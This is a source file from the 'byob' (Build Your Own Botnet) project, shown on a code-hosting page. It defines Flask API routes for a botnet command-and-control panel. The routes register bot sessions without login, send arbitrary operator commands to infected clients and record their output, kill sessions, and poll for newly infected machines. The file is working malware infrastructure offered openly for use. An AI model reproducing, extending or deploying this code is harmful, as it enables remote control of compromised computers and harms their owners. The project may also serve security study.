Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
malwaredllc
GitHub Repository: malwaredllc/byob
 Path: blob/master/web-gui/buildyourownbotnet/api/session/routes.py
1292 views
1
import json

2
from flask import current_app, Blueprint, request, redirect, url_for, flash, jsonify

3
from flask_login import login_user, logout_user, current_user, login_required

4
from buildyourownbotnet import c2

5
from buildyourownbotnet.core.dao import session_dao, task_dao

6
from buildyourownbotnet.models import db, Session

7


8
# Blueprint

9
session = Blueprint('session', __name__)

10


11
@session.route("/api/session/new", methods=["POST"])

12
def session_new():

13
	"""Add session metadata to database."""

14
	if not request.json:

15
		return redirect(url_for('main.sessions'))

16
	data = dict(request.json)

17
	session_metadata = session_dao.handle_session(data)

18
	return jsonify(session_metadata)

19


20
@session.route("/api/session/remove", methods=["POST"])

21
@login_required

22
def session_remove():

23
	"""End an active session."""

24
	session_uid = request.form.get('session_uid')

25


26
	if not session_uid:

27
		flash('Invalid session UID', 'danger')

28
		return redirect(url_for('main.sessions'))

29


30
	# kill connection to C2

31
	owner_sessions = c2.sessions.get(current_user.username, {})

32


33
	if session_uid and session_uid in owner_sessions:

34
		session_thread = owner_sessions[session_uid]

35
		try:

36
			session_thread.kill()

37
		except Exception as e:

38
			return "Error ending session - please try again."

39


40
	# remove session from database

41
	s = session_dao.delete_session(session_uid)

42
	return "Session {} removed.".format(session_uid)

43


44


45
@session.route("/api/session/cmd", methods=["POST"])

46
@login_required

47
def session_cmd():

48
	"""Send commands to clients and return the response."""

49
	session_uid = request.form.get('session_uid')

50


51
	# validate session id is valid integer

52
	if not session_uid:

53
		flash("Invalid bot UID: " + str(session_uid))

54
		return redirect(url_for('main.sessions'))

55


56
	command = request.form.get('cmd')

57


58
	# get user sessions

59
	owner_sessions = c2.sessions.get(current_user.username, {})

60


61
	if session_uid in owner_sessions:

62
		session_thread = owner_sessions[session_uid]

63


64
		# store issued task in database

65
		task = task_dao.handle_task({'task': command, 'session': session_thread.info.get('uid')})

66


67
		# send task and get response

68
		session_thread.send_task(task)

69
		response = session_thread.recv_task()

70


71
		# update task record with result in database

72
		result = task_dao.handle_task(response)

73
		return str(result['result']).encode()

74


75
	else:

76
		return "Bot " + str(session_uid) + " is offline or does not exist."

77


78


79
@session.route("/api/session/poll", methods=["GET"])

80
@login_required

81
def session_poll():

82
	"""Return list of sessions (JSON)."""

83
	new_sessions = []

84
	for s in session_dao.get_user_sessions_new(current_user.id):

85
		new_sessions.append(s.serialize())

86
		s.new = False

87
		db.session.commit()

88
	return jsonify(new_sessions)

89